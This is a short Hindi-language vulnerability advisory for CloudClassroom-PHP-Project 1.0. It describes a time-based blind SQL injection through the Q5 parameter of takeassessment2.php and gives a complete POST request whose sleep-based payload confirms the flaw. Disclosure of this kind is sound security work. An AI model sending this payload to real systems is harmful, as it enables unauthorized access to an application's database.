
CloudClassroom-PHP-Project 1.0 के takeassessment2.php एंडपॉइंट में टाइम-आधारित ब्लाइंड SQL इंजेक्शन भेद्यता के लिए प्रूफ-ऑफ-कॉन्सेप्ट, जो एक क्राफ्टेड POST अनुरोध के माध्यम से रिमोट शोषण का प्रदर्शन करता है।
CloudClassroom-PHP-Project 1.0 के takeassessment2.php एंडपॉइंट में SQL इंजेक्शन की कमज़ोरी मौजूद है, जहाँ Q5 POST पैरामीटर को बिना सैनिटाइज़ किए सीधे SQL स्टेटमेंट्स में डाला जाता है।
कमज़ोरी का प्रकार :
SQL इंजेक्शन
उत्पाद का विक्रेता :
https://github.com/mathurvishal/CloudClassroom-PHP-Project
प्रभावित उत्पाद कोड बेस :
https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0 - https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0
प्रभावित घटक :
takeassessment2.php, Q5 POST पैरामीटर, SQL क्वेरी लॉजिक
हमले के वैक्टर :
इस कमज़ोरी का फायदा उठाने के लिए, हमलावर /CloudClassroom-PHP-Project-master/takeassessment2.php पर Q5 पैरामीटर में एक ऐसा पेलोड भेजता है जो SQL प्रोसेसिंग में समय विलंब पैदा करता है (ब्लाइंड टाइम-बेस्ड SQLi)।
POST अनुरोध:
POST /CloudClassroom-PHP-Project-master/takeassessment2.php?exid=4 HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded
Q1=555&Q2=555&Q3=555&Q4=555&Q5=5550'XOR(555*if(now()=sysdate(),sleep(6),0))XOR'Z&done= इससे प्रतिक्रिया में 6 सेकंड का विलंब होता है, जो कमज़ोरी की पुष्टि करता है।
संदर्भ :
https://owasp.org/www-community/attacks/SQL_Injection
खोजकर्ता : saurabh solanki